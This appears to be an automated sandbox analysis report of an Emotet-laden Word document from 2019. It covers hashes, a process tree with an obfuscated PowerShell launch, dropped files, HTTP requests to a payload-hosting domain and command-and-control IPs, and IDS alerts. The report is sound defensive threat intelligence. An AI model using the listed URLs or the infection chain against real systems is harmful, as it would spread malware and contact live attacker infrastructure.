download: | 201904 |
Full analysis: | https://app.any.run/tasks/9bb9643e-e0b9-451c-a8ed-b4e0d07e10b9 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | April 14, 2019, 19:42:10 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Apr 12 06:35:00 2019, Last Saved Time/Date: Fri Apr 12 06:35:00 2019, Number of Pages: 1, Number of Words: 1, Number of Characters: 12, Security: 0 |
MD5: | 59C3FD6DF92FFBD97ED4A82F632E1A40 |
SHA1: | E700C1E7175DD1FB8F6D8A59A3C454FF7CF04C42 |
SHA256: | AB80799E4EB0B2F4F44A4EA326B87CA16E2FFD1FB7CA60691CB2E338FCA8C147 |
SSDEEP: | 6144:R77HUUUUUUUUUUUUUUUUUUUT52VO+DR3aNmDy5gepRo/v3Dh:R77HUUUUUUUUUUUUUUUUUUUTC1DR3aNC |
Extension | Type |
---|---|
.doc | Microsoft Word document (54.2) |
.doc | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
CompObjUserTypeLen: | 32 |
HeadingPairs: | - |
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 12 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 12 |
Words: | 1 |
Pages: | 1 |
ModifyDate: | 2019:04:12 05:35:00 |
CreateDate: | 2019:04:12 05:35:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | - |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2604 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\201904.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000
2404 | PoWeRsHelL -e <base64-encoded command omitted> | C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRsHelL.exe | — | WmiPrvSE.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
3096 | "C:\Users\admin\480.exe" | C:\Users\admin\480.exe | — | PoWeRsHelL.exe |
User: admin Company: Slacker Integrity Level: MEDIUM Description: SlackerJukeboxLaunch Exit code: 0 Version: 2.1.2370.0000
2760 | --b378b3aa | C:\Users\admin\480.exe | — | 480.exe |
User: admin Company: Slacker Integrity Level: MEDIUM Description: SlackerJukeboxLaunch Exit code: 0 Version: 2.1.2370.0000
2368 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | — | 480.exe |
User: admin Company: Slacker Integrity Level: MEDIUM Description: SlackerJukeboxLaunch Exit code: 0 Version: 2.1.2370.0000
760 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | — | soundser.exe |
User: admin Company: Slacker Integrity Level: MEDIUM Description: SlackerJukeboxLaunch Version: 2.1.2370.0000
PID | Process | Filename | Type |
---|---|---|---|
2604 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR63EC.tmp.cvr | — |
MD5: — SHA256: —
2404 | PoWeRsHelL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\L8VZM9AW0KICP0YX4GEM.temp | — |
MD5: — SHA256: —
2604 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFA1920AC612614D92.TMP | — |
MD5: — SHA256: —
2604 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFC20686E5718CCA21.TMP | — |
MD5: — SHA256: —
2604 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFF95DB61C163390F6.TMP | — |
MD5: — SHA256: —
2604 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{671F1144-E375-4D61-B418-A02EF314FD8D}.tmp | — |
MD5: — SHA256: —
2604 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF9C4CFB9F194B7861.TMP | — |
MD5: — SHA256: —
2604 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{E9F06D18-8A82-4417-9867-ADD0D2FF7AA4}.tmp | — |
MD5: — SHA256: —
2604 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc |
MD5: 03F75A861CC10AD1C3318BEB891B725B SHA256: 7EBE4AE513B230A4E93B55D5C5B1A8281E935A6A42B38FA33B58EA5B73980E58
2604 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb |
MD5: 72C77A14379FE81201EDB9B921AC4E00 SHA256: 8252FF1DF324016A31ABED12768ABE77FE2C2BC545B20897CAD948A06F108634
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2404 | PoWeRsHelL.exe | GET | 404 | 103.18.109.161:80 | http://aussiescanners.com/forum/1IXQRH/ | AU | html | 7.90 Kb | malicious |
2404 | PoWeRsHelL.exe | GET | 200 | 190.8.176.146:80 | http://fumicolcali.com/wblev-6pox5-vpckk/4ih2/ | CO | executable | 123 Kb | suspicious |
760 | soundser.exe | POST | — | 187.188.166.192:80 | http://187.188.166.192/mult/devices/ringin/ | MX | — | — | malicious |
760 | soundser.exe | POST | 200 | 88.215.2.29:80 | http://88.215.2.29/window/ban/ringin/ | GB | binary | 132 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2404 | PoWeRsHelL.exe | 103.18.109.161:80 | aussiescanners.com | Net Virtue Pty Ltd | AU | malicious |
2404 | PoWeRsHelL.exe | 190.8.176.146:80 | fumicolcali.com | Colombia Hosting | CO | malicious |
760 | soundser.exe | 187.188.166.192:80 | — | TOTAL PLAY TELECOMUNICACIONES SA DE CV | MX | malicious |
760 | soundser.exe | 88.215.2.29:80 | — | Gamma Telecom Holdings Ltd | GB | malicious |
Domain | IP | Reputation |
---|---|---|
aussiescanners.com | — | malicious |
fumicolcali.com | — | suspicious |
PID | Process | Class | Message |
---|---|---|---|
2404 | PoWeRsHelL.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2404 | PoWeRsHelL.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2404 | PoWeRsHelL.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2404 | PoWeRsHelL.exe | Misc activity | ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging) |
760 | soundser.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 8 |
760 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
760 | soundser.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 23 |
760 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |